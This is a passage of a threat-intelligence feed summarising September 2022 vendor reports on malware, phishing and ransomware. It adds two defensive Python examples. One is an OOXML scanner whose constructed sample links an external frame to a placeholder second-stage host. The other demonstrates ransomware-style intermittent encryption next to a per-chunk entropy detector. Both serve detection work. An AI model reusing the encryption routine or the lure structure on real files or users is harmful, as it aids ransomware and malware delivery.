- Date of Scan:
- 2022-09-16
- Impact:
- LOW
- Summary:
- CloudSEK researchers analyzed a Raccoon malware sample and found it to be an updated version of Raccoon stealer. In underground forums, the developer of Raccoon stealer is very active, regularly updating the malware and posting about new feature builds.
—
- Intel Source:
- Netskope
- Intel Name:
- Hackers_Continue_to_Abuse_Google_Sites_and_Microsoft_Azure
- Date of Scan:
- 2022-09-16
- Impact:
- LOW
- Summary:
- Netskope researchers discovered a phishing campaign where attackers are abusing Google Sites and Microsoft Azure Web Apps to steal cryptocurrency wallets and accounts from Coinbase, MetaMask, Kraken, and Gemini.
—
- Intel Source:
- JPCERT
- Intel Name:
- BlackTech_Threat_Group_Exploits_F5_BIG-IP_Vulnerability
- Date of Scan:
- 2022-09-16
- Impact:
- MEDIUM
- Summary:
- JPCERT/CC has identified attack activity exploiting the F5 BIG-IP vulnerability (CVE-2022-1388) against Japanese organizations. The targeted organizations have confirmed that data held on the BIG-IP devices was compromised.
Source:
https://blogs.jpcert.or.jp/en/2022/09/bigip-exploit.html
—
- Intel Source:
- Mandiant
- Intel Name:
- Trojanized_PuTTY_through_Phishing
- Date of Scan:
- 2022-09-16
- Impact:
- LOW
- Summary:
- Researchers from Mandiant identified a trojanized PuTTY ISO payload being delivered through a fabricated job lure in a spearphishing operation by the threat cluster tracked as UNC4034, suspected to be part of the "Operation Dream Job" campaigns.
Source:
https://www.mandiant.com/resources/blog/dprk-whatsapp-phishing
—
- Intel Source:
- MalwareBytes
- Intel Name:
- Scammers_Abuse_Microsoft_Edge’s_News_Feed_Ads
- Date of Scan:
- 2022-09-16
- Impact:
- LOW
- Summary:
- Researchers from Malwarebytes have identified an ongoing malvertising campaign that is injecting ads in the Microsoft Edge News Feed to redirect potential victims to websites pushing tech support scams.
—
- Intel Source:
- ISC.SANS
- Intel Name:
- Malicious_Word_Document_With_a_Frameset
- Date of Scan:
- 2022-09-15
- Impact:
- LOW
- Summary:
- SANS researchers have discovered a malicious Word OOXML document (the new “.docx” format) that is a simple downloader. No malicious code is contained in this document, but merely a reference to a second stage which will be delivered when the document is opened.
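The two SANS diaries above point at the same detection lesson: a scanner that keys on the filename VBAProject.bin misses a renamed VBA project, and a scanner that only looks for macros misses a document whose only payload is an external reference. The following is an added example (not code from the SANS diaries) that checks an OOXML container the way Word itself does: it reads the VBA part from the declared content type in [Content_Types].xml regardless of the part's name, and it lists every relationship marked TargetMode="External", which is how a frameset pulls a second stage. The sample document it builds in memory is constructed for the example; the "frame" relationship type string is an assumption about how Word records a frameset source.

```python
"""Scan an OOXML (docx/docm) container for renamed VBA projects and external targets."""
import io
import zipfile
import xml.etree.ElementTree as ET

VBA_CONTENT_TYPE = "application/vnd.ms-office.vbaProject"
CT_NS = "http://schemas.openxmlformats.org/package/2006/content-types"
REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"


def find_vba_parts(zf: zipfile.ZipFile) -> list:
    """Part names whose declared content type is the VBA project, whatever they are called."""
    root = ET.fromstring(zf.read("[Content_Types].xml"))
    parts = set()
    for el in root.iter(f"{{{CT_NS}}}Override"):
        if el.get("ContentType") == VBA_CONTENT_TYPE:
            parts.add(el.get("PartName", "").lstrip("/"))
    # A Default mapping by extension is unusual for VBA, but cheap to honour.
    for el in root.iter(f"{{{CT_NS}}}Default"):
        if el.get("ContentType") == VBA_CONTENT_TYPE:
            ext = "." + el.get("Extension", "").lower()
            parts.update(n for n in zf.namelist() if n.lower().endswith(ext))
    return sorted(parts)


def find_external_targets(zf: zipfile.ZipFile) -> list:
    """(rels file, short relationship type, target) for every TargetMode="External" relationship."""
    hits = []
    for name in zf.namelist():
        if not name.endswith(".rels"):
            continue
        root = ET.fromstring(zf.read(name))
        for rel in root.iter(f"{{{REL_NS}}}Relationship"):
            if rel.get("TargetMode") == "External":
                short_type = rel.get("Type", "").rsplit("/", 1)[-1]
                hits.append((name, short_type, rel.get("Target")))
    return hits


def scan(data: bytes) -> dict:
    """Run both checks over a document held in memory."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        return {"vba_parts": find_vba_parts(zf), "external": find_external_targets(zf)}


def build_sample() -> bytes:
    """Constructed sample, not a real-world file: VBA part renamed FIzzyWAbnj.bin plus an external frame."""
    content_types = f'''<?xml version="1.0" encoding="UTF-8"?>
<Types xmlns="{CT_NS}">
  <Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Default Extension="xml" ContentType="application/xml"/>
  <Override PartName="/word/document.xml" ContentType="application/vnd.ms-word.document.macroEnabled.main+xml"/>
  <Override PartName="/word/FIzzyWAbnj.bin" ContentType="{VBA_CONTENT_TYPE}"/>
</Types>'''
    # Relationship type for a frameset source is assumed here; target host is a placeholder.
    web_rels = f'''<?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="{REL_NS}">
  <Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/frame" Target="http://stage2.example.invalid/next.docx" TargetMode="External"/>
</Relationships>'''
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", content_types)
        zf.writestr("word/document.xml",
                    '<?xml version="1.0"?><w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main"/>')
        # OLE compound-file magic followed by placeholder bytes; enough for a name/type check.
        zf.writestr("word/FIzzyWAbnj.bin", b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1" + b"\x00" * 24)
        zf.writestr("word/_rels/webSettings.xml.rels", web_rels)
    return buf.getvalue()


if __name__ == "__main__":
    result = scan(build_sample())
    print("VBA parts by content type:", result["vba_parts"])
    for rels, rtype, target in result["external"]:
        print(f"external {rtype} in {rels} -> {target}")
```

Run it against a real document by replacing build_sample() with the file's bytes; any VBA part whose name is not word/vbaProject.bin, or any external relationship in a document that should not need one, is worth a closer look.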
—
- Intel Source:
- Cybereason
- Intel Name:
- Exploiting_Notepad++_Plugins_for_Evasion_and_Persistence
- Date of Scan:
- 2022-09-15
- Impact:
- LOW
- Summary:
- Researchers from Cybereason have analyzed a specific technique that leverages Notepad++ plugins to persist and evade security mechanisms on a machine.
—
- Intel Source:
- Symantec
- Intel Name:
- Webworm_hackers_modify_old_malware_in_new_attacks
- Date of Scan:
- 2022-09-15
- Impact:
- LOW
- Summary:
- Researchers from Symantec have observed that the Chinese 'Webworm' hacking group is experimenting with customizing old malware in new attacks, likely to evade attribution and reduce operating costs.
Source:
https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/webworm-espionage-rats
—
- Intel Source:
- Cyble
- Intel Name:
- Japanese_Taxpayers_Targeted_in_Phishing_Campaign
- Date of Scan:
- 2022-09-15
- Impact:
- LOW
- Summary:
- Researchers from Cyble Research & Intelligence Labs discovered a new phishing campaign imitating the National Tax Agency, which targets Japanese users by tricking them into sharing sensitive information.
Source:
https://blog.cyble.com/2022/09/13/phishing-campaign-targets-japanese-tax-payers/
—
- Intel Source:
- Cluster25
- Intel Name:
- One_of_the_most_used_infostealer_Erbium
- Date of Scan:
- 2022-09-15
- Impact:
- LOW
- Summary:
- Cluster25 analysts assess that Erbium could become one of the most widely used infostealers among cybercriminals, owing to its wide range of capabilities and the growing demand for Malware-as-a-Service (MaaS).
Source:
https://blog.cluster25.duskrise.com/2022/09/15/erbium-stealer-a-new-infostealer
—
- Intel Source:
- CISA
- Intel Name:
- Iranian_Cyber_Actors_Exploiting_Known_Vulnerabilities
- Date of Scan:
- 2022-09-15
- Impact:
- MEDIUM
- Summary:
- CISA has identified Iranian Islamic Revolutionary Guard Corps (IRGC)-affiliated cyber actors exploiting known vulnerabilities for data extortion and disk encryption in ransom operations.
—
- Intel Source:
- Cyble
- Intel Name:
- Greek_Banking_Users_Targeted_in_Phishing_Campaign
- Date of Scan:
- 2022-09-15
- Impact:
- LOW
- Summary:
- Researchers from Cyble discovered multiple URLs hosting pages pretending to be Greece’s tax refund website. In order to transfer funds, users must confirm their current account number and the amount of their tax refund.
Source:
https://blog.cyble.com/2022/09/14/phishing-campaign-targets-greek-banking-users/
—
- Intel Source:
- ProofPoint
- Intel Name:
- Hackers_Are_Using_Name_of_Queen_Elizabeth_II_in_Phishing_Attacks
- Date of Scan:
- 2022-09-15
- Impact:
- LOW
- Summary:
- Researchers at Proofpoint have identified threat actors exploiting the death of Queen Elizabeth II in phishing attacks designed to steal their targets' Microsoft account credentials.
Source:
https://twitter.com/threatinsight/status/1570092339984584705
—
- Intel Source:
- WeliveSecurity
- Intel Name:
- New_Linux_SideWalk_backdoor_Variant_used_by_SparklingGoblin_APT_Hackers
- Date of Scan:
- 2022-09-14
- Impact:
- LOW
- Summary:
- ESET researchers have discovered a Linux variant of the SideWalk backdoor used by SparklingGoblin, an APT group whose tactics, techniques, and procedures partially overlap with those of APT41 and BARIUM.
Source:
https://www.welivesecurity.com/2022/09/14/you-never-walk-alone-sidewalk-backdoor-linux-variant/
—
- Intel Source:
- ASEC
- Intel Name:
- A_distribution_of_masking_phishing_websites
- Date of Scan:
- 2022-09-14
- Impact:
- LOW
- Summary:
- While collecting various malware strains, ASEC analysts caught a phishing campaign targeting Korean users, which has been distributed continuously, and only to Korean email accounts, since August. The phishing website's URL is not only distributed through email but also appears among the top results of the Google search engine.
—
- Intel Source:
- Palo Alto
- Intel Name:
- A_new_variant_of_Agent_Tesla
- Date of Scan:
- 2022-09-14
- Impact:
- LOW
- Summary:
- The Agent Tesla keylogger's developers announced on the Agent Tesla Discord server that users should switch to a new keylogger, OriginLogger, which offers the same capabilities as Agent Tesla. OriginLogger is built on the Agent Tesla code base and retains all of its features; it is effectively a variant of Agent Tesla, so the majority of tools and detections for Agent Tesla will still trigger on OriginLogger samples.
—
- Intel Source:
- Secureworks
- Intel Name:
- A_detailed_Analysis_of_Iranian_COBALT_MIRAGE_Threat_Group
- Date of Scan:
- 2022-09-14
- Impact:
- LOW
- Summary:
- Researchers at Secureworks have analyzed ransomware incidents and uncovered details about Iranian COBALT MIRAGE operations. During this incident, COBALT MIRAGE exploited the ProxyShell vulnerabilities (CVE-2021-34473, CVE-2021-34523, and CVE-2021-31207).
Source:
https://www.secureworks.com/blog/opsec-mistakes-reveal-cobalt-mirage-threat-actors
—
- Intel Source:
- TrendMicro
- Intel Name:
- Hackers_Exploiting_Oracle_WebLogic_Server_Vulnerabilities
- Date of Scan:
- 2022-09-14
- Impact:
- MEDIUM
- Summary:
- Trendmicro researchers have observed malicious actors exploiting both newly disclosed and older Oracle WebLogic Server vulnerabilities to deliver cryptocurrency-mining malware.
—
- Intel Source:
- ISC.SANS
- Intel Name:
- Easy_Process_Injection_within_Python
- Date of Scan:
- 2022-09-14
- Impact:
- LOW
- Summary:
- Researchers from SANS have analyzed malicious Python scripts that can call arbitrary Windows API functions and perform process injection using the classic VirtualAlloc, WriteProcessMemory, and CreateRemoteThread sequence.
—
- Intel Source:
- Arcticwolf
- Intel Name:
- Mitel_VoIP_Appliance_Vulnerability_Exploited_by_Lorenz_Ransomware_Group
- Date of Scan:
- 2022-09-13
- Impact:
- LOW
- Summary:
- Arctic Wolf researchers reported that the Lorenz ransomware group was seen exploiting a critical-severity vulnerability in Mitel MiVoice VoIP appliances for initial access into a victim's network.
Source:
https://arcticwolf.com/resources/blog/lorenz-ransomware-chiseling-in/
—
- Intel Source:
- Microsoft
- Intel Name:
- Ransomware_Campaigns_Linked_to_Iranian_Govt’s_DEV_0270_Hackers
- Date of Scan:
- 2022-09-13
- Impact:
- LOW
- Summary:
- Microsoft threat intelligence teams have been tracking multiple ransomware campaigns and have tied these attacks to DEV-0270, also known as Nemesis Kitten, a sub-group of Iranian actor PHOSPHORUS.
—
- Intel Source:
- Symantec
- Intel Name:
- New_Espionage_Activity_Targeting_Asian_Governments
- Date of Scan:
- 2022-09-13
- Impact:
- LOW
- Summary:
- Researchers from Symantec have identified a campaign that targets government and state-owned organizations in several Asian countries, including the offices of multiple prime ministers or heads of government.
Source:
https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/espionage-asia-governments
—
- Intel Source:
- ProofPoint
- Intel Name:
- Iranian_Hackers_Targeting_Nuclear_Security_and_Genomic_Research
- Date of Scan:
- 2022-09-13
- Impact:
- LOW
- Summary:
- Proofpoint researchers have discovered a cyberespionage campaign conducted by TA453 threat actors linked to Iran. It targeted individuals specializing in nuclear security, Middle Eastern affairs, and genome research. To target their victims, threat actors used at least two actor-controlled personas.
—
- Intel Source:
- ISC.SANS
- Intel Name:
- Phishing_Word_Documents_with_Suspicious_URL
- Date of Scan:
- 2022-09-12
- Impact:
- LOW
- Summary:
- Researchers from SANS have analyzed a quarantined email that is marked as phishing by Defender with the Subject: Urgent Payment Issue.
—
- Intel Source:
- DFIR Report
- Intel Name:
- Diving_Deep_into_Emotet_Malware
- Date of Scan:
- 2022-09-12
- Impact:
- LOW
- Summary:
- The DFIR Report has published a deep analysis of an Emotet intrusion.
Source:
https://thedfirreport.com/2022/09/12/dead-or-alive-an-emotet-story/
—
- Intel Source:
- Cofense
- Intel Name:
- A_new_form_of_delivery_of_the_Lampion_banking_trojan
- Date of Scan:
- 2022-09-12
- Impact:
- LOW
- Summary:
- Cofense Phishing Defense Center (PDC) analysts have spotted threat actors delivering the Lampion malware in a new way, through a VBS loader. By hosting the payload on WeTransfer, a trusted cloud file-sharing platform, the threat actors attempt to gain the trust of users while taking advantage of the service provided by the popular site.
Source:
https://cofense.com/blog/lampion-trojan-utilizes-new-delivery-through-cloud-based-sharing
—
- Intel Source:
- Cisco Talos
- Intel Name:
- Lazarus_Hackers_Targeting_Energy_Providers_Around_the_World
- Date of Scan:
- 2022-09-09
- Impact:
- MEDIUM
- Summary:
- A CiscoTalos study discovered that North Korea-linked Lazarus Group targeted energy providers around the world from February through July 2022, including U.S., Canadian, and Japanese companies.
Source:
https://blog.talosintelligence.com/2022/09/lazarus-three-rats.html
—
- Intel Source:
- Palo Alto
- Intel Name:
- Collecting_Credentials_Through_Third-Party_Software
- Date of Scan:
- 2022-09-09
- Impact:
- LOW
- Summary:
- PaloAlto researchers explored some common third-party software scenarios related to credential gathering, examining how passwords are stored, retrieved, and monitored based on real-world attack scenarios.
Source:
https://unit42.paloaltonetworks.com/credential-gathering-third-party-software/
—
- Intel Source:
- Microsoft
- Intel Name:
- A_Deep_Investigation_of_Albanian_Government_Cyberattacks
- Date of Scan:
- 2022-09-09
- Impact:
- LOW
- Summary:
- Microsoft researchers investigated the Albanian government cyberattacks, which disrupted public services and government websites. Besides the destructive cyberattack, MSTIC reports that an Iranian state-sponsored actor released sensitive information that had been exfiltrated earlier.
—
- Intel Source:
- SentinelOne
- Intel Name:
- Ransomware_Developers_Leveraging_Intermittent_Encryption_to_Avoid_Detection
- Date of Scan:
- 2022-09-09
- Impact:
- LOW
- Summary:
- SentinelOne researchers have observed that ransomware developers use intermittent encryption to evade detection. As a result of this encryption method, ransomware operators are able to evade detection systems and encrypt victims’ files more quickly.
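The reason intermittent encryption defeats many detectors is that a whole-file entropy check averages the encrypted segments against the untouched ones. The following is an added example (not from SentinelOne's report) that shows the effect and a per-chunk check that survives it. The SHA-256 counter-mode keystream stands in for whatever cipher a real sample uses, and the encrypt-1-KiB / skip-3-KiB schedule is one illustrative pattern, not a specific family's; the "document" is constructed for the example.

```python
"""Whole-file entropy vs per-chunk entropy against intermittent encryption."""
import hashlib
import math
from collections import Counter

CHUNK = 1024  # detector window; the sample schedule below is aligned to it for clarity


def keystream(key: bytes, nbytes: int) -> bytes:
    """SHA-256(key || counter) stream: uniform bytes, illustration only, not a production cipher."""
    out = bytearray()
    ctr = 0
    while len(out) < nbytes:
        out += hashlib.sha256(key + ctr.to_bytes(8, "little")).digest()
        ctr += 1
    return bytes(out[:nbytes])


def xor_bytes(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def encrypt_full(data: bytes, key: bytes) -> bytes:
    """Conventional mode: every byte is XORed with keystream."""
    return xor_bytes(data, keystream(key, len(data)))


def encrypt_intermittent(data: bytes, key: bytes, block: int = CHUNK, skip: int = 3 * CHUNK) -> bytes:
    """Encrypt `block` bytes, leave `skip` bytes untouched, repeat. XOR makes this its own inverse."""
    out = bytearray(data)
    ks = keystream(key, len(data))
    pos = 0
    while pos < len(data):
        end = min(pos + block, len(data))
        out[pos:end] = xor_bytes(data[pos:end], ks[pos:end])
        pos = end + skip
    return bytes(out)


def entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte (0..8)."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def high_entropy_fraction(data: bytes, chunk: int = CHUNK, threshold: float = 7.0) -> float:
    """Share of fixed-size chunks whose entropy looks ciphertext-like."""
    chunks = [data[i:i + chunk] for i in range(0, len(data), chunk)]
    return sum(1 for c in chunks if entropy(c) >= threshold) / len(chunks)


def looks_encrypted_whole_file(data: bytes, threshold: float = 7.0) -> bool:
    """The naive check: one entropy figure for the whole file."""
    return entropy(data) >= threshold


def looks_encrypted_chunked(data: bytes, min_fraction: float = 0.1) -> bool:
    """The check that still fires: enough individual chunks look like ciphertext."""
    return high_entropy_fraction(data) >= min_fraction


def sample_plaintext(size: int = 64 * CHUNK) -> bytes:
    """Constructed low-entropy 'document' (not a real file)."""
    buf = bytearray()
    for i in range(size):
        buf += f"Quarterly report line {i:05d}: revenue figures pending review.\n".encode()
        if len(buf) >= size:
            break
    return bytes(buf[:size])


if __name__ == "__main__":
    key = bytes(range(32))  # constructed key
    pt = sample_plaintext()
    cases = (("plaintext", pt), ("full", encrypt_full(pt, key)), ("intermittent", encrypt_intermittent(pt, key)))
    for label, blob in cases:
        print(f"{label:12s} whole-file H={entropy(blob):.2f}  hot chunks={high_entropy_fraction(blob):.2f}  "
              f"whole-file verdict={looks_encrypted_whole_file(blob)}  chunked verdict={looks_encrypted_chunked(blob)}")
```

With a quarter of the bytes encrypted, the whole-file entropy stays well under a 7-bits-per-byte threshold while the per-chunk fraction comes out at exactly the encrypted share. Real scanners use a smaller window and stride than the aligned 1 KiB chunks here, which trades speed for the ability to catch segments that do not line up with the window.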
—
- Intel Source:
- Secureworks
- Intel Name:
- Bronze_President_Group_Targeting_Government_Officials
- Date of Scan:
- 2022-09-09
- Impact:
- LOW
- Summary:
- Researchers from Secureworks have identified a PlugX malware campaign targeting computers belonging to government officials of several countries in Europe, the Middle East, and South America.
Source:
https://www.secureworks.com/blog/bronze-president-targets-government-officials
—
- Intel Source:
- Cyble
- Intel Name:
- Bumblebee_Malware_Back_With_New_Technique
- Date of Scan:
- 2022-09-08
- Impact:
- LOW
- Summary:
- Researchers from Cyble came across a Twitter post in which a researcher described an interesting infection chain of the Bumblebee loader malware being distributed via spam campaigns.
Source:
https://blog.cyble.com/2022/09/07/bumblebee-returns-with-new-infection-technique/
—
- Intel Source:
- Google blog
- Intel Name:
- Conti_Cybercrime_Hackers_Targeting_Ukraine
- Date of Scan:
- 2022-09-08
- Impact:
- LOW
- Summary:
- Researchers from Google's Threat Analysis Group have identified that some former Conti ransomware gang members are now part of a threat group tracked as UAC-0098, which is targeting Ukrainian organizations and European non-governmental organizations.
—
- Intel Source:
- Palo Alto
- Intel Name:
- Moobot_Botnet_Targeting_Unpatched_D-Link_Routers
- Date of Scan:
- 2022-09-08
- Impact:
- LOW
- Summary:
- Researchers from PaloAlto have discovered attacks leveraging several vulnerabilities in D-Link routers and the vulnerabilities exploited include CVE-2015-2051, CVE-2018-6530, CVE-2022-26258, and CVE-2022-28958.
Source:
https://unit42.paloaltonetworks.com/moobot-d-link-devices/?web_view=true#post-124794-_73lw4g4a4pw2
—
- Intel Source:
- Mandiant
- Intel Name:
- In-depth_exploration_of_APT42
- Date of Scan:
- 2022-09-08
- Impact:
- LOW
- Summary:
- Mandiant researchers have conducted a deep analysis of APT42 and published a report. This report examines APT42’s recent and historical activities, its tactics, techniques, and procedures, targeting patterns, and historical connections to APT35.
Source:
https://www.mandiant.com/media/17826
https://www.mandiant.com/resources/blog/apt42-charms-cons-compromises
—
- Intel Source:
- BlackBerry
- Intel Name:
- An_Unusual_Case_of_Monti_Ransomware
- Date of Scan:
- 2022-09-08
- Impact:
- LOW
- Summary:
- The BlackBerry Incident Response team have investigated an attack by a previously unknown group, calling itself “MONTI,” which encrypted nearly 20 user hosts as well as a multi-host VMware ESXi cluster that brought down over 20 servers.
—
- Intel Source:
- Cisco Talos
- Intel Name:
- A_new_remote_access_trojan_MagicRAT
- Date of Scan:
- 2022-09-08
- Impact:
- LOW
- Summary:
- Researchers at Cisco Talos have observed a new remote access trojan from the Lazarus APT group being used in the wild for arbitrary command execution.
Source:
https://blog.talosintelligence.com/2022/09/lazarus-magicrat.html
https://github.com/Cisco-Talos/IOCs/tree/main/2022/09
—
- Intel Source:
- Cybereason
- Intel Name:
- A_Deep_Examination_of_PlugX_RAT_Loader
- Date of Scan:
- 2022-09-08
- Impact:
- LOW
- Summary:
- Cybereason researchers have investigated PlugX malware, a Remote Access Tool/Trojan (RAT) often used by Asian APT groups like APT27. With its many malicious “plugins,” the malware has backdoor capabilities that allow it to take complete control over the environment.
Source:
https://www.cybereason.com/blog/threat-analysis-report-plugx-rat-loader-evolution
—
- Intel Source:
- CISA
- Intel Name:
- Vice_Society_Ransomware_Targeting_Education_Sector
- Date of Scan:
- 2022-09-08
- Impact:
- LOW
- Summary:
- The FBI, CISA, and the MS-ISAC have recently observed Vice Society actors disproportionately targeting the education sector with ransomware attacks and they provided the network defenders with Vice Society IOCs and TTPs observed by the FBI in attacks for September 2022.
—
- Intel Source:
- Wordfence
- Intel Name:
- Zero-Day_Vulnerability_Exploited_in_BackupBuddy_Plugin
- Date of Scan:
- 2022-09-08
- Impact:
- LOW
- Summary:
- Wordfence’s Threat Intelligence team have discovered a zero-day vulnerability being actively exploited in BackupBuddy. It is a WordPress plugin with approximately 140,000 installations. The vulnerability allows unauthenticated users to download sensitive information from the affected site.
—
- Intel Source:
- PRODAFT
- Intel Name:
- Diving_Deep_into_TA505_Group
- Date of Scan:
- 2022-09-07
- Impact:
- LOW
- Summary:
- Researchers from the PRODAFT Threat Intelligence team have published an in-depth analysis of the TA505 group. They also identified the group's control panel and used it to glean insight into how the organization works.
Source:
https://www.prodaft.com/resource/detail/ta505-ta505-groups-tesla-gun-depth-analysis
—
- Intel Source:
- Zscaler
- Intel Name:
- The_Ares_Banking_Trojan_Updated_with_Domain_Generation_Algorithm
- Date of Scan:
- 2022-09-07
- Impact:
- LOW
- Summary:
- In an update to the Ares banking trojan, researchers at Zscaler ThreatLabz observed a domain generation algorithm (DGA) that resembles Qakbot’s. Threat actors attempt to maximize the life of an infection, which provides them with the opportunity to monetize compromised systems through wire fraud and ransomware attacks.
—
- Intel Source:
- WeliveSecurity
- Intel Name:
- Worok_Hackers_Targeting_Asian_Companies_and_Governments
- Date of Scan:
- 2022-09-07
- Impact:
- LOW
- Summary:
- WeLiveSecurity (ESET) researchers have discovered a new cyberespionage group, Worok, which has conducted targeted attacks using undocumented tools against various high-profile companies and local governments, mostly in Asia.
Source:
https://www.welivesecurity.com/2022/09/06/worok-big-picture/
—
- Intel Source:
- Cyble
- Intel Name:
- Cyber_Attackers_Leveraging_Red_Teaming_Tools
- Date of Scan:
- 2022-09-07
- Impact:
- LOW
- Summary:
- Cyble researchers have observed threat actors actively using PowerShell Empire to spread multiple infections, employing this red-teaming framework to perform highly stealthy and dangerous attacks against their targets.
Source:
https://blog.cyble.com/2022/09/06/adversaries-actively-utilizing-powershell-empire/
—
- Intel Source:
- AT&T
- Intel Name:
- Shikitega_Malware_Targeting_Linux
- Date of Scan:
- 2022-09-06
- Impact:
- MEDIUM
- Summary:
- Researchers from AT&T Alien Labs have discovered a new malware named Shikitega targeting endpoints and IoT devices that are running Linux operating systems.
Source:
https://cybersecurity.att.com/blogs/labs-research/shikitega-new-stealthy-malware-targeting-linux
—
- Intel Source:
- TrendMicro
- Intel Name:
- Play_Ransomware_Following_the_Tactics_of_Hive_and_Nokoyawa_Ransomware
- Date of Scan:
- 2022-09-06
- Impact:
- LOW
- Summary:
- Trend Micro researchers have investigated Play ransomware and found that it uses many tactics from the playbook of both Hive and Nokoyawa ransomware, including similarities in the file names and file paths of their respective tools and payloads.
—
- Intel Source:
- Avast
- Intel Name:
- NoName057(16)_Hacker_Group_Targeting_Ukraine_Supporters_with_DDoS_Attack
- Date of Scan:
- 2022-09-06
- Impact:
- LOW
- Summary:
- Researchers from Avast Threat Labs have identified a pro-Russian group named NoName057(16) that is performing DDoS attacks on websites belonging to governments, news agencies, armies, suppliers, telecommunications companies, transportation authorities, financial institutions, and more in Ukraine and in neighboring countries supporting Ukraine, such as Estonia, Lithuania, Norway, and Poland.
Source:
https://decoded.avast.io/martinchlumecky/bobik/?utm_source=rss&utm_medium=rss&utm_campaign=bobik
—
- Intel Source:
- TeamCymru
- Intel Name:
- A_Detailed_Analysis_of_Mythic_C2_Framework
- Date of Scan:
- 2022-09-06
- Impact:
- LOW
- Summary:
- Researchers from TeamCymru have done detailed examinations of Mythic C2 Framework. It is a free-to-use, open-source tool, written in Python and provides cross-platform payload creation options for Linux, MacOS, and Windows.
Source:
https://team-cymru.com/blog/2022/09/06/mythic-case-study-assessing-common-offensive-security-tools/
—
- Intel Source:
- Checkpoint
- Intel Name:
- DangerousSavanna_Malicious_Campaign_Targeting_Financial_Institutions
- Date of Scan:
- 2022-09-06
- Impact:
- LOW
- Summary:
- Researchers from Checkpoint have analyzed a malicious campaign called DangerousSavanna, which has been targeting multiple major financial service groups in French-speaking Africa for the last two years.
—
- Intel Source:
- SafeBreach
- Intel Name:
- A_New_CodeRAT_is_Being_Exposed
- Date of Scan:
- 2022-09-05
- Impact:
- LOW
- Summary:
- SafeBreach Labs researchers have discovered a new targeted attack and uncovered New Remote Access Trojan. It is targeting Farsi-speaking code developers using a Microsoft Dynamic Data Exchange (DDE) exploit.
Source:
https://www.safebreach.com/resources/blog/remote-access-trojan-coderat/
—
- Intel Source:
- ASEC
- Intel Name:
- HWP_File_Exploit_OLE_Objects_and_Flash_Vulnerabilities
- Date of Scan:
- 2022-09-05
- Impact:
- LOW
- Summary:
- Researchers from ASEC have identified a malicious HWP file that exploits OLE objects and Flash vulnerabilities. The identified HWP file includes OLE objects, and the corresponding files are generated in the %TEMP% folder when the HWP file is opened.
—
- Intel Source:
- TrendMicro
- Intel Name:
- BumbleBee_is_Refactored_Version_of_Bookworm_Backdoor
- Date of Scan:
- 2022-09-05
- Impact:
- LOW
- Summary:
- Researchers from Trendmicro analyzed a backdoor with a unique modular architecture and named it BumbleBee due to a string embedded in it. The features of BumbleBee and Bookworm are similar, so BumbleBee is likely to be a refactored version of the latter and target Asian local governments.
—
- Intel Source:
- Resecurity
- Intel Name:
- EvilProxy_PhaaS_with_MFA_Bypass_Rising_in_DarkWeb
- Date of Scan:
- 2022-09-05
- Impact:
- LOW
- Summary:
- Researchers from Resecurity have identified a new Phishing-as-a-Service (PhaaS) called EvilProxy advertised in the Dark Web. The threat actors are using Reverse Proxy and Cookie Injection methods to bypass 2FA authentication.
—
- Intel Source:
- Cloudsek
- Intel Name:
- A_Detailed_Analysis_of_Redeemer_Ransomware
- Date of Scan:
- 2022-09-02
- Impact:
- LOW
- Summary:
- Researchers from CloudSEK have deeply analyzed Redeemer Ransomware. It was initially identified in June 2021, and since then, four public versions (1.0, 1.5, 1.7, and 2.0) have been released.
—
- Intel Source:
- CSIRT
- Intel Name:
- Ransomware_targeting_Microsoft_and_VMware_ESXi_servers
- Date of Scan:
- 2022-09-02
- Impact:
- LOW
- Summary:
- CSIRT have reported an incident that affected a government service. The incident corresponds to ransomware that affected Microsoft and VMware ESXi servers in the corporate networks of the institution.
Source:
https://www.csirt.gob.cl/noticias/alerta-de-seguridad-cibernetica-incidente-en-servicio-publico/
—
- Intel Source:
- BitDefender
- Intel Name:
- Snake_Keylogger_Returns_with_New_Malspam_Campaign
- Date of Scan:
- 2022-09-02
- Impact:
- LOW
- Summary:
- According to BitDefender researchers, the IP addresses used in the attack originated from Vietnam, while the campaign’s main targets were based in the USA. To lure victims into opening ZIP archives, attackers use the profile of one of Qatar’s largest IT and cloud service providers. It contains an executable called CPMPANY PROFILE.exe.
—
- Intel Source:
- Zscaler
- Intel Name:
- Prynt_Stealer_Malware_Secret_Backdoor_Exposed
- Date of Scan:
- 2022-09-02
- Impact:
- LOW
- Summary:
- Researchers from Zscaler have uncovered that the Prynt Stealer builder, along with the related WorldWind and DarkEye families, contains a secret backdoor in its code that ends up in every derivative copy and variant of these malware families.
—
- Intel Source:
- Uptycs
- Intel Name:
- ELF_Based_Ransomware_targeting_Linux_system
- Date of Scan:
- 2022-09-02
- Impact:
- LOW
- Summary:
- Researchers from Uptycs have observed an Executable and Linkable Format (ELF) ransomware that encrypts the files on Linux systems under a given folder path and drops a README ransom note.
Source:
https://www.uptycs.com/blog/another-ransomware-for-linux-likely-in-development
—
- Intel Source:
- IBM Security Intelligence
- Intel Name:
- The_Evidence_of_Connection_between_Raspberry_Robin_malware_and_Dridex
- Date of Scan:
- 2022-09-02
- Impact:
- LOW
- Summary:
- Researchers from IBM have identified functional similarities between a malicious component used in the Raspberry Robin infection chain and a Dridex malware loader, further strengthening the operators’ connections to the Russia-based Evil Corp group.
Source:
https://securityintelligence.com/posts/raspberry-robin-worm-dridex-malware/
—
- Intel Source:
- Redacted
- Intel Name:
- Diving_Deep_into_BianLian_Ransomware
- Date of Scan:
- 2022-09-02
- Impact:
- MEDIUM
- Summary:
- Researchers from Redacted have observed the BianLian threat actor tripling their known command and control (C2) infrastructure in the month of August, suggesting a possible increase in the actor’s operational tempo.
—
- Intel Source:
- CERT-UA
- Intel Name:
